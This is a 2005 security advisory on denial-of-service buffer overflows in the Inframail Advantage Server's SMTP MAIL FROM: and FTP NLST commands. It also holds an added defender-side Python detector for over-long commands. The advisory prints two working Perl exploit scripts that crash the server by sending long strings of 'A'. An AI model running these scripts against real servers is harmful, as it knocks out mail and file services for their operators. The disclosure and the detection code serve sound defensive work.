
[NEWS] Infradig Systems Inframail Advantage Server Multiple DoS

Subject: [NEWS] Infradig Systems Inframail Advantage Server Multiple DoS
Date: 30 Jun 2005 15:21:35 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Infradig Systems Inframail Advantage Server Multiple DoS
------------------------------------------------------------------------


SUMMARY

Infradig <http://www.infradig.com/> servers are "servers that support 
SMTP, POP, IMAP, NNTP (NEWS), FTP, HTTP, WEBMAIL, WEBDAV, WAPMAIL, SIP, 
mailing-lists, calendars and document sharing".

A lack of proper command filtering allows attackers to send a long string 
as a command, which causes a buffer overflow that crashes the Infradig 
server.

DETAILS

Vulnerable Systems:
 * Infradig Systems Advantage Server Edition version 6.37

Immune Systems:
 * Infradig Systems Advantage Server Edition version 7.2

The SMTP MAIL FROM: and FTP NLST commands are vulnerable to a buffer 
overflow. Sending the character 'A' 40960 times as the argument to the 
MAIL FROM: command causes the ifmail.exe process to die and re-launch.

Sending the character 'A' roughly 102400 times as the argument to the NLST 
command, and then sending the same NLST command with roughly 102400 'A' 
characters a second time, causes all processes running under the 
ifmailsvc.exe process to die and re-launch (these processes include 
slapd.exe, slurpd.exe, ifmail.exe, ifweb.exe and others).
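
A defender-side check for the condition described above, added here as an example (it is not part of the advisory or of the vendor's patch): it scans a reassembled client command stream for command lines longer than a per-protocol limit. The 512-octet SMTP limit comes from RFC 5321; the 1024-octet FTP limit, the function names and the sample sessions are assumptions constructed for illustration.

```python
import re

# SMTP: 512 octets per command line including CRLF (RFC 5321, 4.5.3.1.4).
# FTP: RFC 959 sets no limit, so 1024 is an assumed local policy value.
LIMITS = {"smtp": 512, "ftp": 1024}
RUN = re.compile(rb"(.)\1{255,}", re.DOTALL)  # 256+ repeats of one byte


def split_commands(stream: bytes):
    """Yield each command line of a client stream, CRLF included.

    A trailing line with no CRLF is yielded too, so an oversized command
    that was cut off mid-transfer is still inspected.
    """
    start = 0
    while start < len(stream):
        end = stream.find(b"\r\n", start)
        end = len(stream) if end < 0 else end + 2
        yield stream[start:end]
        start = end


def inspect(proto: str, stream: bytes):
    """Return one finding per command line that exceeds the protocol limit."""
    findings = []
    for line in split_commands(stream):
        if len(line) <= LIMITS[proto]:
            continue
        verb = re.match(rb"[A-Za-z]+(?: FROM:)?", line)
        findings.append({
            "proto": proto,
            "verb": verb.group(0).decode().upper() if verb else "?",
            "length": len(line),
            "filler": bool(RUN.search(line)),  # long single-byte run present
        })
    return findings


# Constructed sample sessions, sized like the requests the advisory describes.
SMTP_SAMPLE = b"HELO client.example\r\nMAIL FROM:" + b"A" * 40960 + b"\r\n"
FTP_SAMPLE = (b"USER demo\r\nPASS demo\r\n"
              + (b"NLST " + b"A" * 102400 + b"\r\n") * 2)
BENIGN = b"HELO client.example\r\nMAIL FROM:<alice@example.org>\r\nQUIT\r\n"

if __name__ == "__main__":
    for proto, data in (("smtp", SMTP_SAMPLE), ("ftp", FTP_SAMPLE), ("smtp", BENIGN)):
        for finding in inspect(proto, data):
            print(finding)
```

The same length test can sit in a protocol-aware proxy in front of an unpatched server, rejecting the command before it reaches the vulnerable parser.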

Vendor Status:
The vendor has released a patch for Infradig Systems Advantage Server 
Edition.

Exploit:
Inframail_SMTPOverflow.pl
#===== Start Inframail_SMTPOverflow.pl =====
#
# Usage: Inframail_SMTPOverflow.pl <ip>
#    Inframail_SMTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
##############################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto  => "TCP"))
{
        print "Attempting to kill Inframail SMTP server at $ARGV[0]:25...";

        sleep(1);

        print $socket "HELO moto.com\r\n";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}

# EOF

Inframail_FTPOverflow.pl
#
# Usage: Inframail_FTPOverflow.pl <ip>
#    Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
##############################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "21",
                                    Proto  => "TCP"))
{
        print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

        sleep(1);

        print $socket "USER hello\r\n";

        sleep(1);

        print $socket "PASS moto\r\n";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "\r\n";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:21\n";
}

#EOF


ADDITIONAL INFORMATION

The information has been provided by Reed Arvin 
<mailto:reedarvin@gmail.com>.
